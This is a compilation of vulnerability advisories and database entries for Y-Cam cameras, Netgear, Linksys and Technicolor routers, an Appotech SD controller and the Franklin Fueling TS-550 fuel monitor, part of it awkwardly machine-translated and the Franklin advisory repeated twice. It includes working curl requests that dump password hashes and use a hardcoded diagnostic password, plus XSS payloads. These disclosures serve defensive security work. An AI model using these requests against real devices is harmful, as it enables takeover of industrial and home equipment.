Multiple denial-of-service vulnerabilities 3. Multiple HTML-injection vulnerabilities An attacker can exploit these issues to perform unauthorized actions, bypass security restrictions, cause denial-of-service conditions, execute attacker-supplied HTML or JavaScript code in the context of the affected site, to steal cookie-based authentication credentials or gain access to sensitive information. Y-Cam camera models SD range YCB003 etc. The vulnerability is caused by the fact that the en/store_main.asp file does not fully filter the malformed 'path' parameter; the en/account/accedit.asp file does not sufficiently filter the malformed 'item' parameter; en The /smtpclient.asp file does not adequately filter malformed 'emailid' parameters

Multiple cross-site scripting (XSS) vulnerabilities in Y-Cam camera models SD range YCB003, YCK003, and YCW003; S range YCB004, YCK004, YCW004; EyeBall YCEB03; Bullet VGA YCBL03 and YCBLB3; Bullet HD 720 YCBLHD5; Y-cam Classic Range YCB002, YCK002, and YCW003; and Y-cam Original Range YCB001, YCW001, running firmware 4.30 and earlier, allow remote authenticated users to inject arbitrary web script or HTML via the (1) SYSCONTACT parameter to form/identityApply, as triggered using en/identity.asp; (2) PASSWD parameter to form/accAdd, as triggered using en/account/accedit.asp; (3) NTPSERVER parameter to form/clockApply, as triggered using en/clock.asp; (4) SERVER parameter to form/smtpclientApply, as triggered using en/smtpclient.asp; (5) SERVER parameter to form/ftpApply, as triggered using en/ftp.asp; or (6) SERVER parameter to form/httpEventApply, as triggered using en/httpevent.asp. plural Y-Cam The camera firmware contains a cross-site scripting vulnerability.By the remotely authenticated user via the following parameters Web Script or HTML May be inserted. (1) en/identity.asp When induced to use form/identityApply of SYSCONTACT Parameters (2) en/account/accedit.asp When induced to use form/accAdd of PASSWD Parameters (3) en/clock.asp When induced to use form/clockApply of NTPSERVER Parameters (4) en/smtpclient.asp When induced to use form/smtpclientApply of SERVER Parameters (5) en/ftp.asp When induced to use form/ftpApply of SERVER Parameters (6) en/httpevent.asp When induced to use form/httpEventApply of SERVER Parameters. Y-Cam camera is a wireless network security surveillance camera system launched by Y-cam. Multiple Y-Cam Camera Models are prone to the following security vulnerabilities: 1. A directory-traversal vulnerability 2. Multiple denial-of-service vulnerabilities 3. Multiple HTML-injection vulnerabilities An attacker can exploit these issues to perform unauthorized actions, bypass security restrictions, cause denial-of-service conditions, execute attacker-supplied HTML or JavaScript code in the context of the affected site, to steal cookie-based authentication credentials or gain access to sensitive information. Y-Cam camera models SD range YCB003 etc. There is a cross-site scripting vulnerability in many Y-Cam products. The vulnerability is caused by the fact that the en/identity.asp file does not fully filter the 'SYSCONTACT' parameter; the en/account/accedit.asp file does not fully filter the 'PASSWD' parameter; en/clock The .asp file does not sufficiently filter the 'NTPSERVER' parameter; the en/smtpclient.asp file does not sufficiently filter the 'SERVER' parameter; the en/ftp.asp file does not sufficiently filter the 'SERVER' parameter; the en/httpevent.asp file does not sufficiently filter the 'SERVER' parameter 'parameter

Netgear DGN2000 is a wireless router product. The Telnet service part monitored on TCP port 32764 of Netgear DGN2000 product is not archived, and there are security vulnerabilities. After successful exploitation, it can cause execution of arbitrary OS commands. Netgear DGN2000 is prone to an unauthorized-access vulnerability. This may aid in further attacks

cgi-bin/tsaws.cgi in Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 allows remote attackers to discover sensitive information (user names and password hashes) via the cmdWebGetConfiguration action in a TSA_REQUEST. Franklin Fueling Systems are prone to a security bypass vulnerability. Successfully exploiting this issue may allow an attacker to gain access to sensitive configuration information including credentials. This may aid in further attacks. Franklin Fueling Systems 2.0.0.6833 is vulnerable; other versions may also be affected. The system is used to monitor fuel storage and provides an intuitive and easy-to-read interface for alarm functions. Affects prior to version 2.4.0 Product description: A fuel management system with a programmable interface used for inventory and delivery management. Finding 1: Insufficient Access Control Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs CVE: CVE-2013-7247 CWE: CWE-200 As the Guest user (the lowest privilege), a user can post the cmdWebGetConfiguration parameter to cgi-bin/tsaws.cgi. This will return the usernames and password hashes (in DES format) for all users of the application. Once dumped, they can be cracked and used to access authenticated portions of the application. #Request curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://<ip>:10001/cgi-bin/tsaws.cgi #Response <TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-02-19T22:09:22Z" TIME_STAMP_LOCAL="2013-02-19T17:09:22" KEY="11111111" ROLE="roleGuest"><TSA_RESPONSE COMMAND="cmdWebGetConfiguration"><CONFIGURATION> <DEBUGGING LOGGING_ENABLED="false" LOGGING_PATH="/tmp"/> <ROLE_LIST> <ROLE NAME="roleAdmin" PASSWORD="YrKMc2T2BuGvQ"/> <ROLE NAME="roleUser" PASSWORD="2wd2DlEKUPTr2"/> <ROLE NAME="roleGuest" PASSWORD="YXFCsq2GXFQV2"/> </ROLE_LIST> </CONFIGURATION></TSA_RESPONSE></TSA_RESPONSE_LIST> Finding 2: Hardcoded Technician Credentials Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs CVE: CVE-2013-7248 CWE: CWE-798 The three primary users on the TS550 are roleGuest, roleUser, and roleAdmin. Another user exists with additional access named roleDiag. This user can access extra portions of the application such as the command line interface, enable and disable SSH, as well as run SQL commands all from the web interface. The CLI interface includes the ability to run engineering and manufacturing commands. The password for roleDiag is the key (a value returned with every POST request to tsaws.cgi) DES encrypted. This can be done in Ruby: $ irb 1.9.3p374 :001 > "11111111".crypt("aa") => "aaDTlAa1fGGC." #Request curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST PASSWORD="aaDTlAa1fGGC."><TSA_REQUEST COMMAND="cmdWebCheckRole"/></TSA_REQUEST_LIST>' http://<ip>:10001/cgi-bin/tsaws.cgi #Response (note the ROLE) <TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-03-04T16:53:01Z" TIME_STAMP_LOCAL="2013-03-04T11:53:01" KEY="11111111" ROLE="roleDiag"><TSA_RESPONSE COMMAND="cmdWebCheckRole"></TSA_RESPONSE></TSA_RESPONSE_LIST> The password can then be used to run various roleDiag commands. An attacker can enable SSH, and since root's password is the same as roleAdmin, they can completely compromise the device. However, Trustwave SpiderLabs have not verified this fix. Revision History: 04/16/13 - Vulnerability disclosed to vendor 12/18/13 - Fix released on a limited basis by vendor 01/03/14 - Advisory published References 1. http://www.franklinfueling.com/evo/ About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ________________________________ This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is strictly prohibited. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format

Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other versions before 2.4.0 has a hardcoded password for the roleDiag account, which allows remote attackers to gain root privileges, as demonstrated using a cmdWebCheckRole action in a TSA_REQUEST. Franklin Fueling Systems TS-550 evo is prone to a security-bypass vulnerability. Attackers can exploit this issue to bypass the authentication mechanism and gain access to the vulnerable device. Franklin Fueling Systems 2.0.0.6833 is vulnerable; other versions may also be affected. The system is used to monitor fuel storage and provides an intuitive and easy-to-read interface for alarm functions. A remote attacker can use this to gain root privileges and take full control of the device. Affects prior to version 2.4.0 Product description: A fuel management system with a programmable interface used for inventory and delivery management. Finding 1: Insufficient Access Control Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs CVE: CVE-2013-7247 CWE: CWE-200 As the Guest user (the lowest privilege), a user can post the cmdWebGetConfiguration parameter to cgi-bin/tsaws.cgi. This will return the usernames and password hashes (in DES format) for all users of the application. Once dumped, they can be cracked and used to access authenticated portions of the application. #Request curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://<ip>:10001/cgi-bin/tsaws.cgi #Response <TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-02-19T22:09:22Z" TIME_STAMP_LOCAL="2013-02-19T17:09:22" KEY="11111111" ROLE="roleGuest"><TSA_RESPONSE COMMAND="cmdWebGetConfiguration"><CONFIGURATION> <DEBUGGING LOGGING_ENABLED="false" LOGGING_PATH="/tmp"/> <ROLE_LIST> <ROLE NAME="roleAdmin" PASSWORD="YrKMc2T2BuGvQ"/> <ROLE NAME="roleUser" PASSWORD="2wd2DlEKUPTr2"/> <ROLE NAME="roleGuest" PASSWORD="YXFCsq2GXFQV2"/> </ROLE_LIST> </CONFIGURATION></TSA_RESPONSE></TSA_RESPONSE_LIST> Finding 2: Hardcoded Technician Credentials Credit: Nate Drier and Matt Jakubowski of Trustwave SpiderLabs CVE: CVE-2013-7248 CWE: CWE-798 The three primary users on the TS550 are roleGuest, roleUser, and roleAdmin. Another user exists with additional access named roleDiag. This user can access extra portions of the application such as the command line interface, enable and disable SSH, as well as run SQL commands all from the web interface. The CLI interface includes the ability to run engineering and manufacturing commands. The password for roleDiag is the key (a value returned with every POST request to tsaws.cgi) DES encrypted. This can be done in Ruby: $ irb 1.9.3p374 :001 > "11111111".crypt("aa") => "aaDTlAa1fGGC." #Request curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST PASSWORD="aaDTlAa1fGGC."><TSA_REQUEST COMMAND="cmdWebCheckRole"/></TSA_REQUEST_LIST>' http://<ip>:10001/cgi-bin/tsaws.cgi #Response (note the ROLE) <TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-03-04T16:53:01Z" TIME_STAMP_LOCAL="2013-03-04T11:53:01" KEY="11111111" ROLE="roleDiag"><TSA_RESPONSE COMMAND="cmdWebCheckRole"></TSA_RESPONSE></TSA_RESPONSE_LIST> The password can then be used to run various roleDiag commands. An attacker can enable SSH, and since root's password is the same as roleAdmin, they can completely compromise the device. However, Trustwave SpiderLabs have not verified this fix. Revision History: 04/16/13 - Vulnerability disclosed to vendor 12/18/13 - Fix released on a limited basis by vendor 01/03/14 - Advisory published References 1. http://www.franklinfueling.com/evo/ About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ________________________________ This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is strictly prohibited. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format

The Appotech AX211 / AX215 is a microcontroller device. The Appotech AX211 / AX215 8-bit SD card controller has a security vulnerability in the firmware upgrade mechanism. The attacker sends a 'knock' command (CMD63 followed by 'A', 'P', 'P', 'O')). The controller enters firmware load mode, and an attacker who can physically access the memory card can execute arbitrary commands on the card.

Linksys is a division of Cisco Systems that sells home and small business networking products. Linksys was originally founded in 1988 and was acquired by Cisco in 2003. Although Linksys is best known for its broadband and wireless routers, it also produces Ethernet switching and VoIP devices as well as many other products. Many Linksys products (including Linksys WAG200G, Linksys WAG320N, Linksys WAG54G2, Linksys WAG120N, Linksys WAP4410N) have unauthorized access vulnerabilities in their implementation. Attackers can use these vulnerabilities to execute commands on the affected device with administrator privileges. Multiple Routers are prone to an unauthorized-access vulnerability. This may aid in further attacks

Multiple cross-site scripting (XSS) vulnerabilities in Technicolor (formerly Thomson) TC7200 STD6.01.12 allow remote attackers to inject arbitrary web script or HTML via the (1) ADDNewDomain parameter to parental/website-filters.asp or (2) VmTracerouteHost parameter to goform/status/diagnostics-route. (1) parental/website-filters.asp of ADDNewDomain Parameters (2) goform/status/diagnostics-route of VmTracerouteHost Parameters. The Technicolor TC7200 is a next-generation wireless home gateway device. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. Technicolor TC7200 STD6.01.12 is vulnerable. Technicolor (formerly known as Thomson, Thomson) TC7200 is a modem and router product of the French Technicolor Group. The vulnerability comes from the parental/website-filters.asp script not correctly filtering the 'ADDNewDomain' parameter and the goform/status/diagnostics-route script not correctly filtering the 'VmTracerouteHost' parameter. # Exploit Title: Technicolor TC7200 - Multiple XSS Vulnerabilities # Google Dork: N/A # Date: 02-01-2013 # Exploit Author: Jeroen - IT Nerdbox # Vendor Homepage: http://www.technicolor.com/en/solutions-services/connected-home/modems-gatew ays/cable-modems-gateways/tc7200-tc7300 # Software Link: N/A # Version: STD6.01.12 # Tested on: N/A # CVE : CVE-2014-0620 # # Proof of Concept: # # ## Persistent Cross Site Scripting: # # POST : http://<ip>/parental/website-filters.asp # Parameters: # # WebFilteringTable 0 # WebFilteringChangePolicies 0 # WebFiltersADDKeywords # WebFilteringdomainMode 0 # ADDNewDomain <script>alert('IT Nerdbox');</script> # WebFiltersKeywordButton 0 # WebFiltersDomainButton 1 # WebPolicyName # WebFiltersRemove 0 # WebFiltersADD 0 # WebFiltersReset 0 # # ## Reflected Cross Site Scripting # # POST : http://<ip>//goform/status/diagnostics-route # Parameters: # # VmTracerouteHost "><script>alert('IT Nerdbox');</script> # VmMaxTTL 30 # VmTrIsInProgress 0 # VmTrUtilityCommand 1 # # Check out the video at: http://www.nerdbox.it/technicolor-tc7200-xss-vulnerabilities/